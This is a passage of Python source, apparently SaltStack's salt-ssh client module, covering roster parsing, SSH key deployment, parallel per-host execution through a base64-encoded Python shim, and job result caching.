MANPATH=$MANPATH XDG_DATA_DIRS=$XDG_DATA_DIRS \
PKG_CONFIG_PATH=$PKG_CONFIG_PATH \
"$py_cmd_path" -c \
'import base64;
exec(base64.b64decode("""{{SSH_PY_CODE}}""").decode("utf-8"))'
else
exec $SUDO "$py_cmd_path" -c \
'import base64;
exec(base64.b64decode("""{{SSH_PY_CODE}}""").decode("utf-8"))'
fi
exit 0
else
continue
fi
done
echo "ERROR: Unable to locate appropriate python command" >&2
exit $EX_PYTHON_INVALID
EOF'''.format(
EX_THIN_PYTHON_INVALID=salt.defaults.exitcodes.EX_THIN_PYTHON_INVALID,
).split(
"\n"
)
]
)
if not is_windows() and not is_junos():
shim_file = os.path.join(os.path.dirname(__file__), "ssh_py_shim.py")
if not os.path.exists(shim_file):
# On esky builds we only have the .pyc file
shim_file += "c"
with salt.utils.files.fopen(shim_file) as ssh_py_shim:
SSH_PY_SHIM = ssh_py_shim.read()
else:
SSH_PY_SHIM = None
log = logging.getLogger(__name__)
class SSH(MultiprocessingStateMixin):
"""
Create an SSH execution system
"""
ROSTER_UPDATE_FLAG = "#__needs_update"
def __init__(self, opts):
self.__parsed_rosters = {SSH.ROSTER_UPDATE_FLAG: True}
pull_sock = os.path.join(opts["sock_dir"], "master_event_pull.ipc")
if os.path.exists(pull_sock) and zmq:
self.event = salt.utils.event.get_event(
"master", opts["sock_dir"], opts=opts, listen=False
)
else:
self.event = None
self.opts = opts
if self.opts["regen_thin"]:
self.opts["ssh_wipe"] = True
if not salt.utils.path.which("ssh"):
raise salt.exceptions.SaltSystemExit(
code=-1,
msg=(
"No ssh binary found in path -- ssh must be installed for salt-ssh"
" to run. Exiting."
),
)
self.opts["_ssh_version"] = ssh_version()
self.tgt_type = (
self.opts["selected_target_option"]
if self.opts["selected_target_option"]
else "glob"
)
self._expand_target()
self.roster = salt.roster.Roster(self.opts, self.opts.get("roster", "flat"))
self.targets = self.roster.targets(self.opts["tgt"], self.tgt_type)
if not self.targets:
self._update_targets()
# If we're in a wfunc, we need to get the ssh key location from the
# top level opts, stored in __master_opts__
if "__master_opts__" in self.opts:
if self.opts["__master_opts__"].get("ssh_use_home_key") and os.path.isfile(
os.path.expanduser("~/.ssh/id_rsa")
):
priv = os.path.expanduser("~/.ssh/id_rsa")
else:
priv = self.opts["__master_opts__"].get(
"ssh_priv",
os.path.join(
self.opts["__master_opts__"]["pki_dir"], "ssh", "salt-ssh.rsa"
),
)
else:
priv = self.opts.get(
"ssh_priv", os.path.join(self.opts["pki_dir"], "ssh", "salt-ssh.rsa")
)
if priv != "agent-forwarding":
if not os.path.isfile(priv):
try:
salt.client.ssh.shell.gen_key(priv)
except OSError:
raise salt.exceptions.SaltClientError(
"salt-ssh could not be run because it could not generate"
" keys.\n\nYou can probably resolve this by executing this"
" script with increased permissions via sudo or by running as"
" root.\nYou could also use the '-c' option to supply a"
" configuration directory that you have permissions to read and"
" write to."
)
self.defaults = {
"user": self.opts.get(
"ssh_user", salt.config.DEFAULT_MASTER_OPTS["ssh_user"]
),
"port": self.opts.get(
"ssh_port", salt.config.DEFAULT_MASTER_OPTS["ssh_port"]
),
"passwd": self.opts.get(
"ssh_passwd", salt.config.DEFAULT_MASTER_OPTS["ssh_passwd"]
),
"priv": priv,
"priv_passwd": self.opts.get(
"ssh_priv_passwd", salt.config.DEFAULT_MASTER_OPTS["ssh_priv_passwd"]
),
"timeout": self.opts.get(
"ssh_timeout", salt.config.DEFAULT_MASTER_OPTS["ssh_timeout"]
)
+ self.opts.get("timeout", salt.config.DEFAULT_MASTER_OPTS["timeout"]),
"sudo": self.opts.get(
"ssh_sudo", salt.config.DEFAULT_MASTER_OPTS["ssh_sudo"]
),
"sudo_user": self.opts.get(
"ssh_sudo_user", salt.config.DEFAULT_MASTER_OPTS["ssh_sudo_user"]
),
"identities_only": self.opts.get(
"ssh_identities_only",
salt.config.DEFAULT_MASTER_OPTS["ssh_identities_only"],
),
"remote_port_forwards": self.opts.get("ssh_remote_port_forwards"),
"ssh_options": self.opts.get("ssh_options"),
}
if self.opts.get("rand_thin_dir"):
self.defaults["thin_dir"] = os.path.join(
"/var/tmp", ".{}".format(uuid.uuid4().hex[:6])
)
self.opts["ssh_wipe"] = "True"
self.returners = salt.loader.returners(self.opts, {})
self.fsclient = salt.fileclient.FSClient(self.opts)
self.thin = salt.utils.thin.gen_thin(
self.opts["cachedir"],
extra_mods=self.opts.get("thin_extra_mods"),
overwrite=self.opts["regen_thin"],
extended_cfg=self.opts.get("ssh_ext_alternatives"),
)
self.mods = mod_data(self.fsclient)
# __setstate__ and __getstate__ are only used on spawning platforms.
def __setstate__(self, state):
super().__setstate__(state)
# This will invoke __init__ of the most derived class.
self.__init__(state["opts"])
def __getstate__(self):
state = super().__getstate__()
state["opts"] = self.opts
return state
@property
def parse_tgt(self):
"""
Method to determine the hostname and user
when bypassing the roster and using
ssh syntax (ex. root@localhost)
"""
if not self.opts.get("ssh_cli_tgt"):
self.opts["ssh_cli_tgt"] = self.opts.get("tgt", "")
hostname = self.opts.get("ssh_cli_tgt", "")
if "@" in hostname:
user, hostname = hostname.split("@", 1)
else:
user = self.opts.get("ssh_user")
return {"hostname": hostname, "user": user}
def _get_roster(self):
"""
Read roster filename as a key to the data.
:return:
"""
roster_file = salt.roster.get_roster_file(self.opts)
if roster_file not in self.__parsed_rosters:
roster_data = compile_template(
roster_file,
salt.loader.render(self.opts, {}),
self.opts["renderer"],
self.opts["renderer_blacklist"],
self.opts["renderer_whitelist"],
)
self.__parsed_rosters[roster_file] = roster_data
return roster_file
def _expand_target(self):
"""
        Figures out whether the target is a single reachable host (no wildcards) and expands it from the roster if needed.
:return:
"""
# TODO: Support -L
hostname = self.parse_tgt["hostname"]
if isinstance(hostname, list):
return
needs_expansion = "*" not in hostname and salt.utils.network.is_reachable_host(
hostname
)
if needs_expansion:
if hostname is None:
# Reverse lookup failed
return
self._get_roster()
for roster_filename in self.__parsed_rosters:
roster_data = self.__parsed_rosters[roster_filename]
if not isinstance(roster_data, bool):
for host_id in roster_data:
try:
roster_host = roster_data[host_id].get("host")
except AttributeError:
roster_host = roster_data[host_id]
if hostname in [host_id, roster_host]:
if hostname != self.opts["tgt"]:
self.opts["tgt"] = hostname
self.__parsed_rosters[self.ROSTER_UPDATE_FLAG] = False
return
def _update_roster(self):
"""
Update default flat roster with the passed in information.
:return:
"""
roster_file = self._get_roster()
if os.access(roster_file, os.W_OK):
if self.__parsed_rosters[self.ROSTER_UPDATE_FLAG]:
with salt.utils.files.fopen(roster_file, "a") as roster_fp:
roster_fp.write(
'# Automatically added by "{s_user}" at {s_time}\n{hostname}:\n'
" host: {hostname}\n user: {user}\n passwd: {passwd}\n".format(
s_user=getpass.getuser(),
s_time=datetime.datetime.utcnow().isoformat(),
hostname=self.opts.get("tgt", ""),
user=self.opts.get("ssh_user", ""),
passwd=self.opts.get("ssh_passwd", ""),
)
)
log.info(
"The host %s has been added to the roster %s",
self.opts.get("tgt", ""),
roster_file,
)
else:
log.error("Unable to update roster %s: access denied", roster_file)
def _update_targets(self):
"""
        Update targets in case the hostname was passed directly without a roster entry.
:return:
"""
hostname = self.parse_tgt["hostname"]
user = self.parse_tgt["user"]
if hostname == "*":
hostname = ""
if salt.utils.network.is_reachable_host(hostname):
self.opts["tgt"] = hostname
self.targets[hostname] = {
"passwd": self.opts.get("ssh_passwd", ""),
"host": hostname,
"user": user,
}
if self.opts.get("ssh_update_roster"):
self._update_roster()
def get_pubkey(self):
"""
Return the key string for the SSH public key
"""
if (
"__master_opts__" in self.opts
and self.opts["__master_opts__"].get("ssh_use_home_key")
and os.path.isfile(os.path.expanduser("~/.ssh/id_rsa"))
):
priv = os.path.expanduser("~/.ssh/id_rsa")
else:
priv = self.opts.get(
"ssh_priv", os.path.join(self.opts["pki_dir"], "ssh", "salt-ssh.rsa")
)
pub = "{}.pub".format(priv)
with salt.utils.files.fopen(pub, "r") as fp_:
return "{} rsa root@master".format(fp_.read().split()[1])
def key_deploy(self, host, ret):
"""
Deploy the SSH key if the minions don't auth
"""
if not isinstance(ret[host], dict) or self.opts.get("ssh_key_deploy"):
target = self.targets[host]
if target.get("passwd", False) or self.opts["ssh_passwd"]:
self._key_deploy_run(host, target, False)
return ret
if ret[host].get("stderr", "").count("Permission denied"):
target = self.targets[host]
# permission denied, attempt to auto deploy ssh key
print(
"Permission denied for host {}, do you want to deploy "
"the salt-ssh key? (password required):".format(host)
)
deploy = input("[Y/n] ")
if deploy.startswith(("n", "N")):
return ret
target["passwd"] = getpass.getpass(
"Password for {}@{}: ".format(target["user"], host)
)
return self._key_deploy_run(host, target, True)
return ret
def _key_deploy_run(self, host, target, re_run=True):
"""
The ssh-copy-id routine
"""
argv = [
"ssh.set_auth_key",
target.get("user", "root"),
self.get_pubkey(),
]
single = Single(
self.opts,
argv,
host,
mods=self.mods,
fsclient=self.fsclient,
thin=self.thin,
**target
)
if salt.utils.path.which("ssh-copy-id"):
# we have ssh-copy-id, use it!
stdout, stderr, retcode = single.shell.copy_id()
else:
stdout, stderr, retcode = single.run()
if re_run:
target.pop("passwd")
single = Single(
self.opts,
self.opts["argv"],
host,
mods=self.mods,
fsclient=self.fsclient,
thin=self.thin,
**target
)
stdout, stderr, retcode = single.cmd_block()
try:
data = salt.utils.json.find_json(stdout)
return {host: data.get("local", data)}
except Exception: # pylint: disable=broad-except
if stderr:
return {host: stderr}
return {host: "Bad Return"}
if salt.defaults.exitcodes.EX_OK != retcode:
return {host: stderr}
return {host: stdout}
def handle_routine(self, que, opts, host, target, mine=False):
"""
Run the routine in a "Thread", put a dict on the queue
"""
opts = copy.deepcopy(opts)
single = Single(
opts,
opts["argv"],
host,
mods=self.mods,
fsclient=self.fsclient,
thin=self.thin,
mine=mine,
**target
)
ret = {"id": single.id}
stdout, stderr, retcode = single.run()
# This job is done, yield
try:
data = salt.utils.json.find_json(stdout)
if len(data) < 2 and "local" in data:
ret["ret"] = data["local"]
else:
ret["ret"] = {
"stdout": stdout,
"stderr": stderr,
"retcode": retcode,
}
except Exception: # pylint: disable=broad-except
ret["ret"] = {
"stdout": stdout,
"stderr": stderr,
"retcode": retcode,
}
que.put(ret)
def handle_ssh(self, mine=False):
"""
Spin up the needed threads or processes and execute the subsequent
routines
"""
que = multiprocessing.Queue()
running = {}
target_iter = self.targets.__iter__()
returned = set()
rets = set()
init = False
while True:
if not self.targets:
log.error("No matching targets found in roster.")
break
if len(running) < self.opts.get("ssh_max_procs", 25) and not init:
try:
host = next(target_iter)
except StopIteration:
init = True
continue
for default in self.defaults:
if default not in self.targets[host]:
self.targets[host][default] = self.defaults[default]
if "host" not in self.targets[host]:
self.targets[host]["host"] = host
if self.targets[host].get("winrm") and not HAS_WINSHELL:
returned.add(host)
rets.add(host)
log_msg = (
"Please contact sales@saltstack.com for access to the"
" enterprise saltwinshell module."
)
log.debug(log_msg)
no_ret = {
"fun_args": [],
"jid": None,
"return": log_msg,
"retcode": 1,
"fun": "",
"id": host,
}
yield {host: no_ret}
continue
args = (
que,
self.opts,
host,
self.targets[host],
mine,
)
routine = Process(target=self.handle_routine, args=args)
routine.start()
running[host] = {"thread": routine}
continue
ret = {}
try:
ret = que.get(False)
if "id" in ret:
returned.add(ret["id"])
yield {ret["id"]: ret["ret"]}
except queue.Empty:
pass
for host in running:
if not running[host]["thread"].is_alive():
if host not in returned:
# Try to get any returns that came through since we
# last checked
try:
while True:
ret = que.get(False)
if "id" in ret:
returned.add(ret["id"])
yield {ret["id"]: ret["ret"]}
except queue.Empty:
pass
if host not in returned:
error = (
"Target '{}' did not return any data, "
"probably due to an error.".format(host)
)
ret = {"id": host, "ret": error}
log.error(error)
yield {ret["id"]: ret["ret"]}
running[host]["thread"].join()
rets.add(host)
for host in rets:
if host in running:
running.pop(host)
if len(rets) >= len(self.targets):
break
# Sleep when limit or all threads started
if len(running) >= self.opts.get("ssh_max_procs", 25) or len(
self.targets
) >= len(running):
time.sleep(0.1)
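# Usage note (sketch): handle_ssh() is a generator. It spawns one Process per
# target (capped by the ``ssh_max_procs`` option, default 25) and yields
# ``{host: result}`` dictionaries as each routine reports back, roughly:
#
#   for ret in ssh_client.handle_ssh():
#       host, data = next(iter(ret.items()))
#       ...
#
# where ``ssh_client`` stands for the surrounding object; run_iter() and run()
# below are the real call sites.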
def run_iter(self, mine=False, jid=None):
"""
Execute and yield returns as they come in, do not print to the display
mine
The Single objects will use mine_functions defined in the roster,
pillar, or master config (they will be checked in that order) and
will modify the argv with the arguments from mine_functions
"""
fstr = "{}.prep_jid".format(self.opts["master_job_cache"])
jid = self.returners[fstr](passed_jid=jid or self.opts.get("jid", None))
# Save the invocation information
argv = self.opts["argv"]
if self.opts.get("raw_shell", False):
fun = "ssh._raw"
args = argv
else:
fun = argv[0] if argv else ""
args = argv[1:]
job_load = {
"jid": jid,
"tgt_type": self.tgt_type,
"tgt": self.opts["tgt"],
"user": self.opts["user"],
"fun": fun,
"arg": args,
}
# save load to the master job cache
if self.opts["master_job_cache"] == "local_cache":
self.returners["{}.save_load".format(self.opts["master_job_cache"])](
jid, job_load, minions=self.targets.keys()
)
else:
self.returners["{}.save_load".format(self.opts["master_job_cache"])](
jid, job_load
)
for ret in self.handle_ssh(mine=mine):
host = next(iter(ret.keys()))
self.cache_job(jid, host, ret[host], fun)
if self.event:
id_, data = next(iter(ret.items()))
if isinstance(data, str):
data = {"return": data}
if "id" not in data:
data["id"] = id_
if "fun" not in data:
data["fun"] = fun
data[
"jid"
] = jid # make the jid in the payload the same as the jid in the tag
self.event.fire_event(
data, salt.utils.event.tagify([jid, "ret", host], "job")
)
yield ret
def cache_job(self, jid, id_, ret, fun):
"""
Cache the job information
"""
self.returners["{}.returner".format(self.opts["master_job_cache"])](
{"jid": jid, "id": id_, "return": ret, "fun": fun}
)
def run(self, jid=None):
"""
Execute the overall routine, print results via outputters
"""
if self.opts.get("list_hosts"):
self._get_roster()
ret = {}
for roster_file in self.__parsed_rosters:
if roster_file.startswith("#"):
continue
ret[roster_file] = {}
for host_id in self.__parsed_rosters[roster_file]:
hostname = self.__parsed_rosters[roster_file][host_id]["host"]
ret[roster_file][host_id] = hostname
salt.output.display_output(ret, "nested", self.opts)
sys.exit()
fstr = "{}.prep_jid".format(self.opts["master_job_cache"])
jid = self.returners[fstr](passed_jid=jid or self.opts.get("jid", None))
# Save the invocation information
argv = self.opts["argv"]
if self.opts.get("raw_shell", False):
fun = "ssh._raw"
args = argv
else:
fun = argv[0] if argv else ""
args = argv[1:]
job_load = {
"jid": jid,
"tgt_type": self.tgt_type,
"tgt": self.opts["tgt"],
"user": self.opts["user"],
"fun": fun,
"arg": args,
}
# save load to the master job cache
try:
if isinstance(jid, bytes):
jid = jid.decode("utf-8")
if self.opts["master_job_cache"] == "local_cache":
self.returners["{}.save_load".format(self.opts["master_job_cache"])](
jid, job_load, minions=self.targets.keys()
)
else:
self.returners["{}.save_load".format(self.opts["master_job_cache"])](
jid, job_load
)
except Exception as exc: # pylint: disable=broad-except
log.error(
"Could not save load with returner %s: %s",
self.opts["master_job_cache"],
exc,
exc_info=True,
)
if self.opts.get("verbose"):
msg = "Executing job with jid {}".format(jid)
print(msg)
print("-" * len(msg) + "\n")
print("")
sret = {}
outputter = self.opts.get("output", "nested")
final_exit = 0
for ret in self.handle_ssh():
host = next(iter(ret.keys()))
if isinstance(ret[host], dict):
host_ret = ret[host].get("retcode", 0)
if host_ret != 0:
final_exit = 1
else:
# Error on host
final_exit = 1
self.cache_job(jid, host, ret[host], fun)
ret = self.key_deploy(host, ret)
if isinstance(ret[host], dict) and (
ret[host].get("stderr") or ""
).startswith("ssh:"):
ret[host] = ret[host]["stderr"]
if not isinstance(ret[host], dict):
p_data = {host: ret[host]}
elif "return" not in ret[host]:
p_data = ret
else:
outputter = ret[host].get("out", self.opts.get("output", "nested"))
p_data = {host: ret[host].get("return", {})}
if self.opts.get("static"):
sret.update(p_data)
else:
salt.output.display_output(p_data, outputter, self.opts)
if self.event:
id_, data = next(iter(ret.items()))
if isinstance(data, str):
data = {"return": data}
if "id" not in data:
data["id"] = id_
if "fun" not in data:
data["fun"] = fun
data[
"jid"
] = jid # make the jid in the payload the same as the jid in the tag
self.event.fire_event(
data, salt.utils.event.tagify([jid, "ret", host], "job")
)
if self.event is not None:
self.event.destroy()
if self.opts.get("static"):
salt.output.display_output(sret, outputter, self.opts)
if final_exit:
sys.exit(salt.defaults.exitcodes.EX_AGGREGATE)
class Single:
"""
Hold onto a single ssh execution
"""
# 1. Get command ready
# 2. Check if target has salt
# 3. deploy salt-thin
# 4. execute requested command via salt-thin
def __init__(
self,
opts,
argv,
id_,
host,
user=None,
port=None,
passwd=None,
priv=None,
priv_passwd=None,
timeout=30,
sudo=False,
tty=False,
mods=None,
fsclient=None,
thin=None,
mine=False,
minion_opts=None,
identities_only=False,
sudo_user=None,
remote_port_forwards=None,
winrm=False,
ssh_options=None,
**kwargs
):
# Get mine setting and mine_functions if defined in kwargs (from roster)
self.mine = mine
self.mine_functions = kwargs.get("mine_functions")
self.cmd_umask = kwargs.get("cmd_umask", None)
self.winrm = winrm
self.opts = opts
self.tty = tty
if kwargs.get("disable_wipe"):
self.wipe = False
else:
self.wipe = bool(self.opts.get("ssh_wipe"))
if kwargs.get("thin_dir"):
self.thin_dir = kwargs["thin_dir"]
elif self.winrm:
saltwinshell.set_winvars(self)
self.python_env = kwargs.get("ssh_python_env")
else:
if user:
thin_dir = DEFAULT_THIN_DIR.replace("%%USER%%", user)
else:
thin_dir = DEFAULT_THIN_DIR.replace("%%USER%%", "root")
self.thin_dir = thin_dir.replace(
"%%FQDNUUID%%",
uuid.uuid3(uuid.NAMESPACE_DNS, salt.utils.network.get_fqhostname()).hex[
:6
],
)
self.opts["thin_dir"] = self.thin_dir
self.fsclient = fsclient
self.context = {"master_opts": self.opts, "fileclient": self.fsclient}
self.ssh_pre_flight = kwargs.get("ssh_pre_flight", None)
if self.ssh_pre_flight:
self.ssh_pre_file = os.path.basename(self.ssh_pre_flight)
if isinstance(argv, str):
self.argv = [argv]
else:
self.argv = argv
self.fun, self.args, self.kwargs = self.__arg_comps()
self.id = id_
self.set_path = kwargs.get("set_path", "")
self.mods = mods if isinstance(mods, dict) else {}
args = {
"host": host,
"user": user,
"port": port,
"passwd": passwd,
"priv": priv,
"priv_passwd": priv_passwd,
"timeout": timeout,
"sudo": sudo,
"tty": tty,
"mods": self.mods,
"identities_only": identities_only,
"sudo_user": sudo_user,
"remote_port_forwards": remote_port_forwards,
"winrm": winrm,
"ssh_options": ssh_options,
}
# Pre apply changeable defaults
self.minion_opts = {
"grains_cache": True,
"log_file": "salt-call.log",
}
self.minion_opts.update(opts.get("ssh_minion_opts", {}))
if minion_opts is not None:
self.minion_opts.update(minion_opts)
# Post apply system needed defaults
self.minion_opts.update(
{
"root_dir": os.path.join(self.thin_dir, "running_data"),
"id": self.id,
"sock_dir": "/",
"fileserver_list_cache_time": 3,
}
)
self.minion_config = salt.serializers.yaml.serialize(self.minion_opts)
self.target = kwargs
self.target.update(args)
self.wfuncs = salt.loader.ssh_wrapper(opts, None, self.context)
self.shell = salt.client.ssh.shell.gen_shell(opts, **args)
if self.winrm:
# Determine if Windows client is x86 or AMD64
arch, _, _ = self.shell.exec_cmd("powershell $ENV:PROCESSOR_ARCHITECTURE")
self.arch = arch.strip()
self.thin = thin if thin else salt.utils.thin.thin_path(opts["cachedir"])
def __arg_comps(self):
"""
Return the function name and the arg list
"""
fun = self.argv[0] if self.argv else ""
parsed = salt.utils.args.parse_input(
self.argv[1:], condition=False, no_parse=self.opts.get("no_parse", [])
)
args = parsed[0]
kws = parsed[1]
return fun, args, kws
def _escape_arg(self, arg):
"""
Properly escape argument to protect special characters from shell
interpretation. This avoids having to do tricky argument quoting.
Effectively just escape all characters in the argument that are not
alphanumeric!
"""
if self.winrm:
return arg
return "".join(["\\" + char if re.match(r"\W", char) else char for char in arg])
def run_ssh_pre_flight(self):
"""
Run our pre_flight script before running any ssh commands
"""
script = os.path.join(tempfile.gettempdir(), self.ssh_pre_file)
self.shell.send(self.ssh_pre_flight, script)
return self.execute_script(script)
def check_thin_dir(self):
"""
check if the thindir exists on the remote machine
"""
stdout, stderr, retcode = self.shell.exec_cmd(
"test -d {}".format(self.thin_dir)
)
if retcode != 0:
return False
return True
def deploy(self):
"""
Deploy salt-thin
"""
self.shell.send(
self.thin,
os.path.join(self.thin_dir, "salt-thin.tgz"),
)
self.deploy_ext()
return True
def deploy_ext(self):
"""
Deploy the ext_mods tarball
"""
if self.mods.get("file"):
self.shell.send(
self.mods["file"],
os.path.join(self.thin_dir, "salt-ext_mods.tgz"),
)
return True
def run(self, deploy_attempted=False):
"""
Execute the routine, the routine can be either:
1. Execute a raw shell command
2. Execute a wrapper func
3. Execute a remote Salt command
If a (re)deploy is needed, then retry the operation after a deploy
attempt
Returns tuple of (stdout, stderr, retcode)
"""
stdout = stderr = retcode = None
if self.ssh_pre_flight:
if not self.opts.get("ssh_run_pre_flight", False) and self.check_thin_dir():
log.info(
"%s thin dir already exists. Not running ssh_pre_flight script",
self.thin_dir,
)
elif not os.path.exists(self.ssh_pre_flight):
log.error(
"The ssh_pre_flight script %s does not exist", self.ssh_pre_flight
)
else:
stdout, stderr, retcode = self.run_ssh_pre_flight()
if retcode != 0:
log.error(
"Error running ssh_pre_flight script %s", self.ssh_pre_file
)
return stdout, stderr, retcode
log.info(
"Successfully ran the ssh_pre_flight script: %s", self.ssh_pre_file
)
if self.opts.get("raw_shell", False):
cmd_str = " ".join([self._escape_arg(arg) for arg in self.argv])
stdout, stderr, retcode = self.shell.exec_cmd(cmd_str)
elif self.fun in self.wfuncs or self.mine:
stdout, retcode = self.run_wfunc()
else:
stdout, stderr, retcode = self.cmd_block()
return stdout, stderr, retcode
def run_wfunc(self):
"""
Execute a wrapper function
Returns tuple of (json_data, retcode)
"""
# Ensure that opts/grains are up to date
# Execute routine
data_cache = False
data = None
cdir = os.path.join(self.opts["cachedir"], "minions", self.id)
if not os.path.isdir(cdir):
os.makedirs(cdir)
datap = os.path.join(cdir, "ssh_data.p")
refresh = False
if not os.path.isfile(datap):
refresh = True
else:
passed_time = (time.time() - os.stat(datap).st_mtime) / 60
if passed_time > self.opts.get("cache_life", 60):
refresh = True
if self.opts.get("refresh_cache"):
refresh = True
conf_grains = {}
# Save conf file grains before they get clobbered
if "ssh_grains" in self.opts:
conf_grains = self.opts["ssh_grains"]
if not data_cache:
refresh = True
if refresh:
# Make the datap
# TODO: Auto expire the datap
pre_wrapper = salt.client.ssh.wrapper.FunctionWrapper(
self.opts,
self.id,
fsclient=self.fsclient,
minion_opts=self.minion_opts,
**self.target
)
opts_pkg = pre_wrapper["test.opts_pkg"]() # pylint: disable=E1102
if "_error" in opts_pkg:
# Refresh failed
retcode = opts_pkg["retcode"]
ret = salt.utils.json.dumps({"local": opts_pkg})
return ret, retcode
opts_pkg["file_roots"] = self.opts["file_roots"]
opts_pkg["pillar_roots"] = self.opts["pillar_roots"]
opts_pkg["ext_pillar"] = self.opts["ext_pillar"]
opts_pkg["extension_modules"] = self.opts["extension_modules"]
opts_pkg["module_dirs"] = self.opts["module_dirs"]
opts_pkg["_ssh_version"] = self.opts["_ssh_version"]
opts_pkg["thin_dir"] = self.opts["thin_dir"]
opts_pkg["master_tops"] = self.opts["master_tops"]
opts_pkg["extra_filerefs"] = self.opts.get("extra_filerefs", "")
opts_pkg["__master_opts__"] = self.context["master_opts"]
if "known_hosts_file" in self.opts:
opts_pkg["known_hosts_file"] = self.opts["known_hosts_file"]
if "_caller_cachedir" in self.opts:
opts_pkg["_caller_cachedir"] = self.opts["_caller_cachedir"]
else:
opts_pkg["_caller_cachedir"] = self.opts["cachedir"]
# Use the ID defined in the roster file
opts_pkg["id"] = self.id
retcode = 0
# Restore master grains
for grain in conf_grains:
opts_pkg["grains"][grain] = conf_grains[grain]
# Enable roster grains support
if "grains" in self.target:
for grain in self.target["grains"]:
opts_pkg["grains"][grain] = self.target["grains"][grain]
popts = {}
popts.update(opts_pkg["__master_opts__"])
popts.update(opts_pkg)
pillar = salt.pillar.Pillar(
popts,
opts_pkg["grains"],
opts_pkg["id"],
opts_pkg.get("saltenv", "base"),
)
pillar_data = pillar.compile_pillar()
# TODO: cache minion opts in datap in master.py
data = {
"opts": opts_pkg,
"grains": opts_pkg["grains"],
"pillar": pillar_data,
}
if data_cache:
with salt.utils.files.fopen(datap, "w+b") as fp_:
fp_.write(salt.payload.dumps(data))
if not data and data_cache:
with salt.utils.files.fopen(datap, "rb") as fp_:
data = salt.payload.load(fp_)
opts = data.get("opts", {})
opts["grains"] = data.get("grains")
# Restore master grains
for grain in conf_grains:
opts["grains"][grain] = conf_grains[grain]
# Enable roster grains support
if "grains" in self.target:
for grain in self.target["grains"]:
opts["grains"][grain] = self.target["grains"][grain]
opts["pillar"] = data.get("pillar")
wrapper = salt.client.ssh.wrapper.FunctionWrapper(
opts,
self.id,
fsclient=self.fsclient,
minion_opts=self.minion_opts,
**self.target
)
wrapper.fsclient.opts["cachedir"] = opts["cachedir"]
self.wfuncs = salt.loader.ssh_wrapper(opts, wrapper, self.context)
wrapper.wfuncs = self.wfuncs
# We're running in the mine, need to fetch the arguments from the
# roster, pillar, master config (in that order)
if self.mine:
mine_args = None
mine_fun_data = None
mine_fun = self.fun
if self.mine_functions and self.fun in self.mine_functions:
mine_fun_data = self.mine_functions[self.fun]
elif opts["pillar"] and self.fun in opts["pillar"].get(
"mine_functions", {}
):
mine_fun_data = opts["pillar"]["mine_functions"][self.fun]
elif self.fun in self.context["master_opts"].get("mine_functions", {}):
mine_fun_data = self.context["master_opts"]["mine_functions"][self.fun]
if isinstance(mine_fun_data, dict):
mine_fun = mine_fun_data.pop("mine_function", mine_fun)
mine_args = mine_fun_data
elif isinstance(mine_fun_data, list):
for item in mine_fun_data[:]:
if isinstance(item, dict) and "mine_function" in item:
mine_fun = item["mine_function"]
mine_fun_data.pop(mine_fun_data.index(item))
mine_args = mine_fun_data
else:
mine_args = mine_fun_data
# If we found mine_args, replace our command's args
if isinstance(mine_args, dict):
self.args = []
self.kwargs = mine_args
elif isinstance(mine_args, list):
self.args = mine_args
self.kwargs = {}
try:
if self.mine:
result = wrapper[mine_fun](*self.args, **self.kwargs)
else:
result = self.wfuncs[self.fun](*self.args, **self.kwargs)
except TypeError as exc:
result = "TypeError encountered executing {}: {}".format(self.fun, exc)
log.error(result, exc_info_on_loglevel=logging.DEBUG)
retcode = 1
except Exception as exc: # pylint: disable=broad-except
result = "An Exception occurred while executing {}: {}".format(
self.fun, exc
)
log.error(result, exc_info_on_loglevel=logging.DEBUG)
retcode = 1
# Mimic the json data-structure that "salt-call --local" will
# emit (as seen in ssh_py_shim.py)
if isinstance(result, dict) and "local" in result:
ret = salt.utils.json.dumps({"local": result["local"]})
else:
ret = salt.utils.json.dumps({"local": {"return": result}})
return ret, retcode
def _cmd_str(self):
"""
Prepare the command string
"""
sudo = "sudo" if self.target["sudo"] else ""
sudo_user = self.target["sudo_user"]
if "_caller_cachedir" in self.opts:
cachedir = self.opts["_caller_cachedir"]
else:
cachedir = self.opts["cachedir"]
thin_code_digest, thin_sum = salt.utils.thin.thin_sum(cachedir, "sha1")
debug = ""
if not self.opts.get("log_level"):
self.opts["log_level"] = "info"
if (
salt.log.setup.LOG_LEVELS["debug"]
>= salt.log.setup.LOG_LEVELS[self.opts.get("log_level", "info")]
):
debug = "1"
arg_str = '''
OPTIONS.config = \
"""
{config}
"""
OPTIONS.delimiter = '{delimeter}'
OPTIONS.saltdir = '{saltdir}'
OPTIONS.checksum = '{checksum}'
OPTIONS.hashfunc = '{hashfunc}'
OPTIONS.version = '{version}'
OPTIONS.ext_mods = '{ext_mods}'
OPTIONS.wipe = {wipe}
OPTIONS.tty = {tty}
OPTIONS.cmd_umask = {cmd_umask}
OPTIONS.code_checksum = {code_checksum}
ARGS = {arguments}\n'''.format(
config=self.minion_config,
delimeter=RSTR,
saltdir=self.thin_dir,
checksum=thin_sum,
hashfunc="sha1",
version=salt.version.__version__,
ext_mods=self.mods.get("version", ""),
wipe=self.wipe,
tty=self.tty,
cmd_umask=self.cmd_umask,
code_checksum=thin_code_digest,
arguments=self.argv,
)
py_code = SSH_PY_SHIM.replace("#%%OPTS", arg_str)
py_code_enc = base64.encodebytes(py_code.encode("utf-8")).decode("utf-8")
if not self.winrm:
cmd = SSH_SH_SHIM.format(
DEBUG=debug,
SUDO=sudo,
SUDO_USER=sudo_user,
SSH_PY_CODE=py_code_enc,
HOST_PY_MAJOR=sys.version_info[0],
SET_PATH=self.set_path,
)
else:
cmd = saltwinshell.gen_shim(py_code_enc)
return cmd
def execute_script(self, script, extension="py", pre_dir=""):
"""
execute a script on the minion then delete
"""
if extension == "ps1":
ret = self.shell.exec_cmd('"powershell {}"'.format(script))
else:
if not self.winrm:
ret = self.shell.exec_cmd("/bin/sh '{}{}'".format(pre_dir, script))
else:
ret = saltwinshell.call_python(self, script)
# Remove file from target system
if not self.winrm:
self.shell.exec_cmd("rm '{}{}'".format(pre_dir, script))
else:
self.shell.exec_cmd("del {}".format(script))
return ret
def shim_cmd(self, cmd_str, extension="py"):
"""
Run a shim command.
If tty is enabled, we must scp the shim to the target system and
execute it there
"""
if not self.tty and not self.winrm:
return self.shell.exec_cmd(cmd_str)
# Write the shim to a temporary file in the default temp directory
with tempfile.NamedTemporaryFile(
mode="w+b", prefix="shim_", delete=False
) as shim_tmp_file:
shim_tmp_file.write(salt.utils.stringutils.to_bytes(cmd_str))
# Copy shim to target system, under $HOME/.<randomized name>
target_shim_file = ".{}.{}".format(
binascii.hexlify(os.urandom(6)).decode("ascii"), extension
)
